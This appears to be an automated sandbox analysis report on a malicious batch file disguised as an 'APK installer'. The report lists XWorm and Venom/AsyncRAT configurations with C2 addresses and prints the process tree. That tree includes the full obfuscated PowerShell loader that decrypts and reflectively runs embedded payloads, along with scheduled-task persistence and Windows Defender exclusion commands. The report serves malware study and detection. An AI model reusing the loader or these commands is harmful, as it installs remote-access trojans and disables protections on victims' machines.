Analysis

  • max time kernel
    47s
  • max time network
    47s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    29-05-2024 20:03

General

  • Target

    APK-installer.bat

  • Size

    442KB

  • MD5

    52709a177ea05374516eae946c3f800d

  • SHA1

    f8a17588756941fca054402b1d32770d22b63d1e

  • SHA256

    d9bf2b9cf084edc7ea54d3bc7facd312951b434f8e64b712a8233c113da7d881

  • SHA512

    35caadb87ac6e6853aab7818672e5509919c216e5ca51bc98d6156aca5a199f436196dcdc2bb6b45b15c824f811643630c7cbfe522202f835efdf6cc2a355ebb

  • SSDEEP

    12288:zSDnZG9iQNJTvPA+/P3PIN/0Hl+SZK2jUG7O:onONJk+Xwh2ly2NO

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

147.185.221.19:38173

Mutex

uuhaiushdishajkdhwuasudh

Attributes
  • delay

    1

  • install

    true

  • install_file

    svhost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a tool written in C# that is designed to remotely monitor and control other computers.

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run PowerShell and hide the display window.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK-installer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HKpM+MBCuE/wlYaN2z/DvAVm3pCgflW2mkVPWFmqfPg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d/N2APtjUjErXNR+ZLigRg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yTnJn=New-Object System.IO.MemoryStream(,$param_var); $eUYRj=New-Object System.IO.MemoryStream; $oMWJO=New-Object System.IO.Compression.GZipStream($yTnJn, [IO.Compression.CompressionMode]::Decompress); $oMWJO.CopyTo($eUYRj); $oMWJO.Dispose(); $yTnJn.Dispose(); $eUYRj.Dispose(); $eUYRj.ToArray();}function execute_function($param_var,$param2_var){ $RZQgO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NRzTU=$RZQgO.EntryPoint; $NRzTU.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK-installer.bat';$irigc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK-installer.bat').Split([Environment]::NewLine);foreach ($LYNsH in $irigc) { if ($LYNsH.StartsWith(':: ')) { $NJfxg=$LYNsH.Substring(3); break; }}$payloads_var=[string[]]$NJfxg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4252
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_772_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_772.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_772.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_772.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3592
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HKpM+MBCuE/wlYaN2z/DvAVm3pCgflW2mkVPWFmqfPg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d/N2APtjUjErXNR+ZLigRg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $yTnJn=New-Object System.IO.MemoryStream(,$param_var); $eUYRj=New-Object System.IO.MemoryStream; $oMWJO=New-Object System.IO.Compression.GZipStream($yTnJn, [IO.Compression.CompressionMode]::Decompress); $oMWJO.CopyTo($eUYRj); $oMWJO.Dispose(); $yTnJn.Dispose(); $eUYRj.Dispose(); $eUYRj.ToArray();}function execute_function($param_var,$param2_var){ $RZQgO=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NRzTU=$RZQgO.EntryPoint; $NRzTU.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_772.bat';$irigc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_772.bat').Split([Environment]::NewLine);foreach ($LYNsH in $irigc) { if ($LYNsH.StartsWith(':: ')) { $NJfxg=$LYNsH.Substring(3); break; }}$payloads_var=[string[]]$NJfxg.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2416
            • C:\Users\Admin\AppData\Roaming\XClient.exe
              "C:\Users\Admin\AppData\Roaming\XClient.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4516
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4768
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3804
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2120
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:3452
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
                7⤵
                • Creates scheduled task(s)
                PID:1076
              • C:\Windows\System32\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /delete /f /tn "Runtime Broker"
                7⤵
                  PID:4424
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDF06.tmp.bat""
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2852
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    8⤵
                    • Delays execution with timeout.exe
                    PID:3404
              • C:\Users\Admin\AppData\Roaming\Client.exe
                "C:\Users\Admin\AppData\Roaming\Client.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:848
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"' & exit
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2116
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "svhost" /tr '"C:\Users\Admin\AppData\Roaming\svhost.exe"'
                    8⤵
                    • Creates scheduled task(s)
                    PID:1452
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4873.tmp.bat""
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4888
                  • C:\Windows\system32\timeout.exe
                    timeout 3
                    8⤵
                    • Delays execution with timeout.exe
                    PID:1192
                  • C:\Users\Admin\AppData\Roaming\svhost.exe
                    "C:\Users\Admin\AppData\Roaming\svhost.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:3012
    • C:\Users\Admin\Runtime Broker.exe
      "C:\Users\Admin\Runtime Broker.exe"
      1⤵
      • Executes dropped EXE
      PID:4360

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_103ebfls.jjp.ps1

      Filesize

      60B

    • C:\Users\Admin\AppData\Local\Temp\tmp4873.tmp.bat

      Filesize

      150B

    • C:\Users\Admin\AppData\Local\Temp\tmpDF06.tmp.bat

      Filesize

      156B

    • C:\Users\Admin\AppData\Roaming\Client.exe

      Filesize

      74KB

    • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

      Filesize

      8B

    • C:\Users\Admin\AppData\Roaming\XClient.exe

      Filesize

      71KB

    • C:\Users\Admin\AppData\Roaming\startup_str_772.bat

      Filesize

      442KB

    • C:\Users\Admin\AppData\Roaming\startup_str_772.vbs

      Filesize

      115B
